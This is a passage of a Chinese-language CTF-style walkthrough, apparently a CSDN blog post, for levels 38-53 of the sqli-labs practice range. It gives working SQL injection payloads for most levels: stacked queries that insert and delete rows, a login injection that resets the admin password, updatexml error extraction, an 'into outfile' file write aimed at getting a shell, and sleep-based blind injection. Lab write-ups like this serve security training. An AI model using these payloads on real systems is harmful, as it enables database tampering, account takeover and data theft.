2024.2.4

level-38 

（堆叠注入） 

这题乍一看感觉又是来卖萌的，这不是和level-1一模一样吗

然后仔细看了一下源代码，根据 mysqli_multi_query 猜测这题的本意应该是堆叠注入

mysqli_multi_query() 是 PHP 中用于执行多个 SQL 查询语句的函数。这个函数允许你在一个连接中执行多个查询，并返回一个结果标识符，以便你可以逐个获取每个查询的结果。

函数的语法：

mysqli_multi_query(mysqli $connection, string $query)

• $connection：一个有效的 mysqli 连接标识符。
• $query：要执行的 SQL 查询语句。

返回值：

• 如果第一个查询语句执行成功，该函数返回一个结果标识符，你可以使用这个标识符来获取查询结果。如果第一个查询语句失败，该函数将返回 FALSE。
• 对于后续的查询语句，该函数将返回 TRUE 或 FALSE，具体取决于查询是否成功。

利用堆叠注入进行数据库的篡改 

对users表中插入数据：

?id=1';insert into users(id,username,password) value(15,'2024','干杯！') -- a

为了方便这里的查询操作用cmd显示 

对着level-1试了一下，果然不行

删除刚刚插入的数据

?id=1';delete from users where id=15 -- a

（level-38能有什么坏心思呢，他不过可以多线程操作罢了(๑＞ڡ＜)☆）

level-39 

 （堆叠注入）

和level-39一样，只是改成了数字型

?id=-1 union select 1,2,3;delete from users where id=15 -- a

level-40 

 （堆叠注入）

都是前几关玩剩下的 

?id=-1') union select 1,2,3;delete from users where id=15 -- a

level-41 

 （堆叠注入）

和level-39一样 

?id=-1 union select 1,2,3;delete from users where id=15 -- a

level-42 

（堆叠注入）

普通用户利用堆叠注入可以修改管理员密码 

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-43 

 （堆叠注入）

用 ') 闭合，其他和level-42一样 

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-44 

 （堆叠注入）

 和level-42一样 

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-45 

 和level-43一样

login_user=Dumb&login_password=Dumb');update users set password='123456' where username='admin' -- a&mysubmit=Login

level-46 

 提示传入sort变量

?sort=1

查看源码可以知道是一个数字型的order by注入

可以直接报错注入或者GETSHELL 

?sort=1 and updatexml(1,concat('~',database(),'~'),1)

?sort=1 into outfile "D:/1.txt"

level-47 

 字符型的order by注入

?sort=1' and updatexml(1,concat('~',database(),'~'),1) -- a

level-48

 数字型，时间盲注引发服务器报错（可能不是正解，但能用（doge））

?sort=1 and if(mid((select+database()),1,1)='a',sleep(5),0) -- a

level-49 

改成了字符型，用 ' 闭合，其他和level-48一样，一招鲜吃遍天

?sort=1' and if(mid((select+database()),1,1)='a',sleep(5),0) -- a

level-50 

level-51 

level-52 

level-53

除了可以堆叠注入，均和上几关相同

看起来所有的 boss 都已经被你轻松斩于马下，去挑战独孤求败的自己吧

sqli-labs-master靶场训练笔记（54-65|决战紫禁之巓）-CSDN博客https://blog.csdn.net/ymy13326056686/article/details/136039776